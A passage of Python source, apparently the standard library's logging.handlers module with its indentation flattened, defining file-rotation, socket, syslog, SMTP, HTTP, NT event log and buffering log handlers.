DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = _MIDNIGHT - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = t[6] # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def emit(self, record):
"""
Emit a record.
First check if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except OSError as err:
if err.errno == errno.ENOENT:
sres = None
else:
raise
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if hasattr(s, 'settimeout'):
s.settimeout(timeout)
try:
s.connect((self.host, self.port))
return s
except socket.error:
s.close()
raise
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except socket.error:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
if hasattr(self.sock, "sendall"):
self.sock.sendall(s)
else: #pragma: no cover
sentsofar = 0
left = len(s)
while left > 0:
sent = self.sock.send(s[sentsofar:])
sentsofar = sentsofar + sent
left = left - sent
except socket.error: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
if self.sock:
self.sock.close()
self.sock = None
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, (self.host, self.port))
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
self._connect_unixsocket(address)
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socktype)
if socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.socktype = socktype
self.formatter = None
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except socket.error:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except socket.error:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
"""
We need to convert record level to lowercase, maybe this will
change in the future.
"""
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
try:
if self.unixsocket:
try:
self.socket.send(msg)
except socket.error:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, tuple):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, tuple):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.utils import formatdate
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('u%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip()
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
self.flush()
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
